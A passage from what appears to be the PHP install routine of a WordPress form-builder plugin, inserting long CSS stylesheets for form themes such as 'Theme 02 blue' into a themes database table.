overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 02 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #ADC0DB;\r\nmargin-bottom: 10px;\r\ncolor: #ADC0DB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/01/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #708EB4;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #144077;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #708EB4;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #144077;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #285485;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #ADC0DB;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #C5C5C5;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size:18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n} \r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n	color: #2564A3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0E3F77;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #0e3f77; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0e3f77), color-stop(49%, #0f437d), color-stop(84%, #2f72b5), color-stop(99%, #165ba9)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 